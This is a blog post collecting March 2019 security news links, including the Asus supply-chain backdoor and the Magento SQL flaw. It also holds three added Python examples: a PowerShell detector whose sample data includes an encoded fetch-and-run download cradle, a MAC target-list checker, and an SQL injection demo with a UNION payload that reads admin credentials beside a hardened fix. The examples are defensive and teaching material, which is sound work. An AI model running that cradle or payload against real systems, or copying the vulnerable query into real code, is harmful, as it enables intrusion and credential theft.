This posting is here to collect cyber security news from March 2019.
I post links to security vulnerability news in the comments of this article.
If you are interested in cyber security trends, read my Cyber security trends 2019 posting.
You are also free to post related links.
Tomi Engdahl says:
Hackers Are Loving PowerShell, Study Finds
https://www.securityweek.com/hackers-are-loving-powershell-study-finds
Threat Actors Prefer PowerShell over Other ATT&CK Techniques, Report Shows
PowerShell is by far the most prevalent MITRE ATT&CK technique, being detected twice as often as the next most common technique, says a new report from cybersecurity firm Red Canary.
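Since the report counts PowerShell as the most-detected technique, the practical question for a defender is what a PowerShell detection actually looks like. The following is an added example, not code from Red Canary or the linked article: it scores process-creation records for the traits that usually separate attacker PowerShell from administrative use (an -EncodedCommand payload, a hidden window, a download cradle, Invoke-Expression, an execution-policy bypass) and decodes the encoded payload so the same checks run on its plaintext. The log records are constructed stand-ins for the command-line field of Windows event 4688 or Sysmon event 1; the field layout and the thresholds are assumptions for the demo.

```python
"""Score constructed PowerShell process-creation records for attacker traits.

Added example; not from the Red Canary report. The (host, image, cmdline)
tuples below are constructed sample events, not real telemetry.
"""
import base64
import re

# Constructed sample events. ws02 carries a base64(UTF-16LE) download cradle,
# which is how -EncodedCommand payloads are actually packaged.
SAMPLE_EVENTS = [
    ("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ("ws02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
         .encode("utf-16-le")).decode("ascii")),
    ("ws03", r"C:\Windows\explorer.exe", "explorer.exe"),
    ("ws04", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c \"Invoke-Expression (Get-Content .\\x.txt)\""),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so match the
# short forms attackers use (-e, -ec, -en, -enc) as well as the full name.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")
EP_BYPASS = re.compile(r"(?i)(?:^|\s)-(?:ep|executionpolicy)\s+bypass")
DOWNLOAD_CRADLE = re.compile(r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)")
IEX = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")

def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(image, cmdline):
    """Return (score, reasons) for one record; non-PowerShell images score 0."""
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    reasons = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        text = cmdline + " " + decoded   # run the content checks on the payload too
    if HIDDEN_FLAG.search(cmdline):
        reasons.append("hidden window")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download cradle")
    if IEX.search(text):
        reasons.append("invoke-expression")
    if EP_BYPASS.search(cmdline):
        reasons.append("execution policy bypass")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Map host -> reasons for records scoring at or above threshold (assumed value)."""
    hits = {}
    for host, image, cmdline in events:
        score, reasons = score_event(image, cmdline)
        if score >= threshold:
            hits[host] = reasons
    return hits

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS).items():
        print(host, ", ".join(reasons))
```

With the constructed events only ws02 crosses the threshold; the backup script on ws01 trips a single trait (execution-policy bypass) and is left alone, which is the point of scoring rather than alerting on any one flag. Decoding the payload matters: without it, ws02 would show only "encoded command" and "hidden window", and the cradle would stay hidden from keyword rules.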
Tomi Engdahl says:
Office Depot And OfficeMax Find Malware That Isn’t There
https://hackaday.com/2019/03/28/office-depot-and-officemax-find-malware-that-isnt-there/
Plenty of stores — including big box office stores such as Office Depot and OfficeMax — will be glad to help you.
The Federal Trade Commission (FTC) has fined Office Depot (who owns OfficeMax) $25 million and plans to use the funds to issue refunds. In addition, a vendor, Support.com, will pay $10 million to support the refunds.
The free check used software to detect problems on a PC. However, during the scan the user is asked if their computer has any of the following symptoms. For example, if their PC has become slow or frequently reboots. If you said yes to any of these questions, the software would produce a report claiming to have found evidence of malware and offering fixes that could cost significant amounts of money even if there was no other evidence.
Tomi Engdahl says:
Microsoft Retaliates Against APT35 Hacker Group by Seizing 99 Domains
https://www.bleepingcomputer.com/news/security/microsoft-retaliates-against-apt35-hacker-group-by-seizing-99-domains/
Tomi Engdahl says:
Bitcoin exchange DragonEx ‘hacked for undisclosed amount’
https://thenextweb.com/hardfork/2019/03/26/bitcoin-exchange-dragonex-hacked-for-undisclosed-amount/
Another day, another hack
Tomi Engdahl says:
Ransomware Behind Norsk Hydro Attack Takes On Wiper-Like Capabilities
https://threatpost.com/lockergoga-ransomware-norsk-hydro-wiper/143181/
Tomi Engdahl says:
Don’t change your Twitter birthday to 2007 unless you want to get kicked off for being under 13
You can’t actually unlock new color schemes!
https://www.theverge.com/tldr/2019/3/26/18282942/twitter-birthday-prank-2007-13-color-scheme
A viral prank trying to get people to change their Twitter birthdays to 2007 is getting users locked out of the platform for being under 13. The prank tweets tell users that changing the Twitter birthdays on their profiles will do everything from unlocking new color schemes, getting them admin privileges, or even a verified check. It gives me great pain to have to narc on a solid prank, but this won’t actually happen.
Tomi Engdahl says:
Russia Regularly Spoofs Regional GPS
https://www.darkreading.com/risk/russia-regularly-spoofs-regional-gps/d/d-id/1334262
The nation is a pioneer in spoofing and blocking satellite navigation signals, causing more than 9,800 incidents in the past three years, according to an analysis of navigational data.
Tomi Engdahl says:
Virus attacks Spain’s defense intranet, foreign state suspected: paper
https://www.reuters.com/article/us-spain-security-cyberattack/virus-attacks-spains-defense-intranet-foreign-state-suspected-paper-idUSKCN1R7115
Tomi Engdahl says:
Researchers Find Google Play Store Apps Were Actually Government Malware
https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv
Security researchers have found a new kind of government malware that was hiding in plain sight within apps on Android’s Play Store. And they appear to have uncovered a case of lawful intercept gone wrong.
Tomi Engdahl says:
Office Depot Fined $25 Million For Scamming Customers With Bogus Malware Scans
https://amp.hothardware.com/news/office-depot-fined-scamming-customers-malware-scans
Tomi Engdahl says:
The FCC has fined robocallers $208 million. It’s collected $6,790.
https://www.foxnews.com/tech/the-fcc-has-fined-robocallers-208-million-its-collected-6790
Tomi Engdahl says:
Encryption law: time for tech industry to take the reins
https://itwire.com/open-sauce/86520-encryption-law-time-for-tech-industry-to-take-the-reins.html
a Sydney forum, organised under the name Safe Encryption Australia, outlining the negatives of the law.
Tomi Engdahl says:
Hackers dropped a secret backdoor in Asus’ update software
https://techcrunch.com/2019/03/25/asus-update-backdoor/
Tomi Engdahl says:
https://haxnology.com/top-5-ways-to-grow-hacking-skills/
Tomi Engdahl says:
Malware Installed in Asus Computers through Hacked Update Process
https://www.schneier.com/blog/archives/2019/03/malware_install.html
Kaspersky Labs is reporting on a new supply chain attack they call “Shadowhammer.”
Tomi Engdahl says:
Firefox launches Lockbox: The safest password manager for Android
https://www.technotification.com/2019/03/firefox-lockbox-password-manager-android.html
Tomi Engdahl says:
Releasing the NSA’s Previously Classified Tool ‘Ghidra’ For Free Is a ‘Game Changer’
https://motherboard.vice.com/en_us/article/panvm7/nsa-releases-ghidra-for-free-game-changer
The NSA released a free and open-source reverse engineering app called ‘Ghidra’.
Tomi Engdahl says:
https://www.cnet.com/news/article-13-eu-approves-controversial-copyright-law/
Tomi Engdahl says:
We’re already in the middle of a major cyber war, experts believe
https://www.foxnews.com/tech/were-already-in-the-middle-of-a-major-cyberwar-experts-believe
A whopping 87 percent of information security specialists believe we’re in the middle of a global cyber war.
Tomi Engdahl says:
Growing Drone Industry Spawns a Growing Antidrone Industry
https://spectrum.ieee.org/aerospace/aviation/growing-drone-industry-spawns-a-growing-antidrone-industry
Tomi Engdahl says:
J-CODE Announces 61 Arrests in its Second Coordinated Law Enforcement Operation Targeting Opioid Trafficking on the Darknet
https://www.fbi.gov/news/pressrel/press-releases/j-code-announces-61-arrests-in-its-second-coordinated-law-enforcement-operation-targeting-opioid-trafficking-on-the-darknet?utm_campaign=email-Daily&utm_medium=email&utm_source=national-press-releases&utm_content=%5B721800%5D-%2Fnews%2Fpressrel%2Fpress-releases%2Fj-code-announces-61-arrests-in-its-second-coordinated-law-enforcement-operation-targeting-opioid-trafficking-on-the-darknet
Tomi Engdahl says:
Researcher finds new way to sniff Windows BitLocker encryption keys
https://nakedsecurity.sophos.com/2019/03/21/researcher-finds-new-way-to-sniff-windows-bitlocker-encryption-keys/
Tomi Engdahl says:
The Fragile State of U.K. Banking Sector IT Systems Continues Unabated
https://spectrum.ieee.org/riskfactor/computing/it/the-fragile-state-of-uk-banking-sector-it-systems-continues-unabated
Banking sector IT systems in the United Kingdom are in a very sorry state. A review of various media reports shows that in 2018, there were at least 44 bank and building-society-related IT operational or cybersecurity incidents that prevented customers from accessing their payment services.
Tomi Engdahl says:
How Russia tampers with GPS
https://www.axios.com/how-russia-tampers-with-gps-f43f91d9-fa0f-4a6d-a2a6-2857b5b4985e.html
Satellite navigation systems like the Global Positioning System (GPS) make so many different pieces of our global infrastructure tick that most countries treat their signals as sacrosanct, knowing that interfering with them could have devastating effects. But a new report released Tuesday is giving us the first broad view of a country — Russia — that’s pervasively tampering with the service.
Tomi Engdahl says:
FTC Crackdown Stops Operations Responsible for Billions of Illegal Robocalls
https://www.ftc.gov/news-events/press-releases/2019/03/ftc-crackdown-stops-operations-responsible-billions-illegal
Unwanted calls pitched auto warranties, debt-relief services, Google listings, and a fake charity
Tomi Engdahl says:
How medical devices like pacemakers and insulin pumps can be hacked
https://www.cbsnews.com/news/cybersecurity-researchers-show-medical-devices-hacking-vulnerabilities/
Tomi Engdahl says:
New Virus Steals Your Files Until PewDiePie Gets 100M Subscribers
https://futurism.com/ransomware-encrypts-files-pewdiepie
Another ransomware variant encrypts your files unless you subscribe to PewDiePie — but even if you do, it deletes them anyway.
Tomi Engdahl says:
Ransomware Forces Two Chemical Companies to Order ‘Hundreds of New Computers’
https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers
Tomi Engdahl says:
20 years for swatter who got a man killed
https://techcrunch.com/2019/03/29/20-years-for-swatter-who-got-a-man-killed/
Tyler Barriss, a prolific and seemingly unremorseful repeat swatter and bomb hoaxer whose fakery got a man killed in 2017, has been sentenced to 20 years in prison. This hopefully closes the book on a long and disturbing career of random and mercenary harassment and threats.
Tomi Engdahl says:
Pentagon Warns Silicon Valley About Aiding Chinese Military
https://spectrum.ieee.org/tech-talk/aerospace/military/pentagon-warns-silicon-valley-about-aiding-chinese-military
Tomi Engdahl says:
Here’s the List of ~600 MAC Addresses Targeted in Recent ASUS Hack
https://thehackernews.com/2019/03/asus-hack-mac-addresses.html?m=1
Russian security firm Kaspersky last week didn’t release the full list of all MAC addresses that hackers hardcoded into their malware to surgically target a specific pool of users.
offline tool and launched an online web page where ASUS PC users can search for their MAC addresses to check whether they were in the hit list.
ASUS Hack: Operation ShadowHammer
It was revealed last week that a group of state-sponsored hackers managed to hijack ASUS Live automatic software update server last year and pushed malicious updates to over one million Windows computers worldwide in order to infect them with backdoors.
Though the second stage malware was only pushed to nearly 600 targeted users, it doesn’t mean that millions of ASUS computers which received the malicious software update are not compromised.
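The lookup tools mentioned above answer one narrow question: does any adapter on this machine match the hardcoded target list? The following is an added example of that check, not Kaspersky's tool and not ASUS code. It assumes the list is published as hashes of canonicalised MAC addresses so the raw targets need not be disclosed (the page does not describe how the malware encoded them, so the SHA-256 scheme here is an assumption), normalises the many ways a MAC is written, and returns only the matching adapters. The target list itself is constructed from two made-up, locally administered addresses.

```python
"""Check a host's MAC addresses against a hashed target list.

Added example in the style of the ShadowHammer lookup tools; not Kaspersky's
or ASUS's code. TARGET_FINGERPRINTS is constructed for the demo and the
SHA-256-of-canonical-MAC scheme is an assumption, not the malware's encoding.
"""
import hashlib
import re
import uuid

def normalize_mac(mac):
    """Canonical form: 12 lowercase hex digits with separators removed.
    Accepts 'AA:BB:CC:DD:EE:FF', 'aa-bb-cc-dd-ee-ff', 'aabb.ccdd.eeff' or bare hex."""
    hexdigits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(hexdigits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return hexdigits.lower()

def mac_fingerprint(mac):
    """Fingerprint used for list membership (assumed scheme for this demo)."""
    return hashlib.sha256(normalize_mac(mac).encode("ascii")).hexdigest()

# Constructed target list. Both MACs have the locally-administered bit set
# (0x02 in the first octet), so they are not real vendor assignments.
TARGET_FINGERPRINTS = frozenset({
    mac_fingerprint("02:00:5e:10:00:01"),
    mac_fingerprint("02:00:5e:10:00:02"),
})

def targeted_adapters(adapter_macs, targets=TARGET_FINGERPRINTS):
    """Return the canonical MACs from adapter_macs that are on the target list.

    Entries that are not MACs (interfaces without a hardware address, junk) are
    skipped. An empty result means 'no adapter matched', which, as the article
    stresses, is not the same as 'this machine was not compromised'.
    """
    hits = []
    for mac in adapter_macs:
        try:
            fp = mac_fingerprint(mac)
        except ValueError:
            continue
        if fp in targets:
            hits.append(normalize_mac(mac))
    return hits

def this_host_mac():
    """One MAC of the current host from the stdlib. A real checker must
    enumerate every adapter, since the malware compared all of them."""
    node = uuid.getnode()
    return ":".join(f"{(node >> shift) & 0xff:02x}" for shift in range(40, -1, -8))

if __name__ == "__main__":
    print("this host:", this_host_mac(), targeted_adapters([this_host_mac()]))
```

The normalisation step is where such checkers most often go wrong: a list built from "AA:BB:..." will silently miss an adapter reported as "aabb.ccdd.eeff" unless both sides are reduced to the same canonical string before hashing.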
Tomi Engdahl says:
Hacker Rigs New Zealand Shooter’s Manifesto With Malware
https://uk.pcmag.com/news/120294/hacker-rigs-new-zealand-shooters-manifesto-with-malware
A hacker is responding to the New Zealand mosque shooting by booby-trapping the attacker’s manifesto with malware.
Tomi Engdahl says:
CNBC:
Researchers find totaled Teslas contain unencrypted and personally revealing data about owners, including locations visited, phone contacts, and dash cam video
Tesla cars keep more data than you think, including this video of a crash that totaled a Model 3
https://www.cnbc.com/2019/03/29/tesla-model-3-keeps-data-like-crash-videos-location-phone-contacts.html
Crashed Tesla vehicles, sold at junk yards and auctions, contain deeply personal and unencrypted data including info from drivers’ paired mobile devices, and video showing what happened just before the accident.
Security researcher GreenTheOnly extracted unencrypted video, phonebooks, calendar items and other data from Model S, Model X and Model 3 vehicles purchased for testing and research at salvage.
Hackers who test or modify the systems in their own Tesla vehicles are flagged internally, ensuring that they are not among the first to receive over-the-air software updates.
Tomi Engdahl says:
Dan Goodin / Ars Technica:
A newly published exploit for a Magento vulnerability that can be used without authentication puts hundreds of thousands of e-commerce sites at risk
Brace yourselves: Exploit published for serious Magento bug allowing card skimming [Updated]
Magento admins: Beware of SQL flaw that requires no authentication.
https://arstechnica.com/information-technology/2019/03/severe-magento-bug-opens-300k-commerce-sites-to-card-skimming-attacks/
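What makes an unauthenticated SQL injection in a storefront so dangerous is that the attacker reaches the database through a page anyone can load. The following is an added illustration of that bug class only; it is not Magento code and does not reproduce the specific flaw, whose details the article does not give. A constructed product lookup splices the request parameter into the query, a constructed UNION payload reads the admin credential table through it with no session at all, and the hardened version beside it binds the parameter and type-checks it so the same input returns nothing.

```python
"""Unauthenticated SQL injection: vulnerable lookup beside its hardened form.

Added example of the bug class; not Magento code and not the actual flaw.
The schema, rows and payload are constructed for the demo (sqlite3, stdlib).
"""
import sqlite3

def make_db():
    """In-memory store: a public products table plus an admin table an
    anonymous visitor must never be able to read."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE product(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE admin_user(username TEXT, password_hash TEXT);
        INSERT INTO product VALUES (1, 'Mug', 9.5), (2, 'Hoodie', 39.0);
        INSERT INTO admin_user VALUES ('admin', '$2y$10$constructedhash');
    """)
    return con

def product_vulnerable(con, product_id):
    """Anonymous endpoint that formats the request parameter straight into SQL.
    product_id is attacker-controlled text, so it can carry SQL of its own."""
    sql = f"SELECT id, name, price FROM product WHERE id = {product_id}"
    return con.execute(sql).fetchall()

def product_hardened(con, product_id):
    """Same lookup with a bound parameter and a type check: the value is only
    ever compared by the engine, never parsed as part of the statement."""
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        return []
    return con.execute(
        "SELECT id, name, price FROM product WHERE id = ?", (pid,)
    ).fetchall()

# Constructed payload: a UNION whose column count and types line up with the
# product query, so the admin row comes back as if it were a product.
PAYLOAD = "0 UNION SELECT 0, username, password_hash FROM admin_user"

def demo():
    """Run both endpoints against the payload and a legitimate id."""
    con = make_db()
    return {
        "vulnerable": product_vulnerable(con, PAYLOAD),
        "hardened": product_hardened(con, PAYLOAD),
        "legit": product_hardened(con, "2"),
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Binding the parameter is the fix; the int() check on top of it is cheap defence in depth that also turns a probing payload into a clean empty result rather than a database error an attacker can learn from. Once an attacker can read or write the database this way, planting a card-skimming script in a storefront template is a short step, which is why the article treats an SQL bug and card skimming as one story.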
Tomi Engdahl says:
Gavin De Becker / The Daily Beast:
Jeff Bezos’ security chief says his investigation concluded with high confidence that Saudi Arabia “had access to Bezos’ phone, and gained private information” — The National Enquirer’s lawyer tried to get me to say there was no hacking.
Bezos Investigation Finds the Saudis Obtained His Private Data
https://www.thedailybeast.com/jeff-bezos-investigation-finds-the-saudis-obtained-his-private-information
The National Enquirer’s lawyer tried to get me to say there was no hacking.
“Our investigators and several experts concluded with high confidence that the Saudis had access to Bezos’ phone, and gained private information.”
Experts with whom we consulted confirmed New York Times reports on the Saudi capability to “collect vast amounts of previously inaccessible data from smartphones in the air without leaving a trace—including phone calls, texts, emails”—and confirmed that hacking was a key part of the Saudis’ “extensive surveillance efforts that ultimately led to the killing of [Washington Post] journalist Jamal Khashoggi.”
Some Americans will be surprised to learn that the Saudi government has been intent on harming Jeff Bezos since last October, when the Post began its relentless coverage of Khashoggi’s murder. The Saudi campaign against Bezos has already been reported by CNN International, Bloomberg, The Daily Beast, and others.
Saudi Arabia attacks people in many ways, obviously, including through their elaborate social media program that uses sophisticated technology and paid surrogates to create artificially trending hashtags
Tomi Engdahl says:
Mark Zuckerberg / Washington Post:
Mark Zuckerberg calls for global regulations in four areas: policing harmful content, election integrity, a GDPR-like privacy framework, and data portability — Mark Zuckerberg is founder and chief executive of Facebook. — Technology is a major part of our lives, and companies such as Facebook have immense responsibilities.
http://www.washingtonpost.com/opinions/mark-zuckerberg-the-internet-needs-new-rules-lets-start-in-these-four-areas/2019/03/29/9e6f0504-521a-11e9-a3f7-78b7525a8d5f_story.html
Tomi Engdahl says:
Alex W. Palmer / Wired:
A behind-the-scenes account of how a member of TripAdvisor’s anti-fraud team helped the FCC track down a Florida man accused of making 96M+ illegal robocalls — BRAD YOUNG, A lawyer at TripAdvisor, arrived at the company’s offices in Needham, Massachusetts, on October 12, 2015 …
https://www.wired.com/story/on-the-trail-of-the-robocall-king/
Tomi Engdahl says:
NSA-Inspired Vulnerability Found in Huawei Laptops
https://www.schneier.com/blog/archives/2019/03/nsa-inspired_vu.html
This is an interesting story of a serious vulnerability in a Huawei driver that Microsoft found. The vulnerability is similar in style to the NSA’s DOUBLEPULSAR that was leaked by the Shadow Brokers — believed to be the Russian government — and it’s obvious that this attack copied that technique.
Tomi Engdahl says:
Equifax, FICO launch Data Decision Cloud as credit scores meld with marketing, compliance, customer experience
https://www.zdnet.com/article/equifax-fico-launch-data-decision-cloud-as-credit-scores-meld-with-marketing-compliance-customer-experience/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem:+Trending+Content
By combining data pools and platforms, the companies hope to find more insights, build better predictive models and manage customer experiences better.
Tomi Engdahl says:
Huawei savaged by Brit code review board over pisspoor dev practices
HCSEC pulls no technical punches in annual report
https://www.theregister.co.uk/2019/03/28/hcsec_huawei_oversight_board_savaging_annual_report/
Britain’s Huawei oversight board has said the Chinese company is a threat to British national security after all – and some existing mobile network equipment will have to be ripped out and replaced to get rid of said threat.
“The work of HCSEC [Huawei Cyber Security Evaluation Centre]… reveals serious and systematic defects in Huawei’s software engineering and cyber security competence,” said the HCSEC oversight board in its annual report, published this morning.